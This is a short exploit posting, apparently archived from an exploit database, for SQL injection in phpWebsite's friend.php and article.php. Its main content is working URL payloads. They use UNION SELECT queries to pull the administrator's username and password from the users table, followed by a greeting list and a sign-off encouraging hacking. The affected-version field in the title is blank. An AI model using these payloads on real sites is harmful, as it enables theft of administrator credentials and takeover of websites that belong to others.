phpWebsite <= SQL Injection (friend.php) & (article.php)

2006-03-2000:00:00

vulners.com

[+]phpWebsite
[+]DaBDouB-MoSiKaR [Moroccan Security Team]
[+]creetz to: Moroccan security Team[Dr.E-vil,Dr.Erase,H0550N],ToM-le-Magician[france] , ameer[egypt],
Esp!onLeRaVaGe, CiM TeaM, xMs3D0,|ucifer,B6,al-houda members[nabil,sn!per,Kasparov]and all hackers musilm
[morocco] and www.lezr.com
[+]special 10x to: safaa
[-]get name
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
[+]
[-]get password:
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1
[+] second sql
[-]http://[target]/article.php?sid=[sql]
[+]have nice day and hack

JSON

phpWebsite &lt;= SQL Injection &#40;friend.php&#41; &amp; &#40;article.php&#41;

phpWebsite <= SQL Injection (friend.php) & (article.php)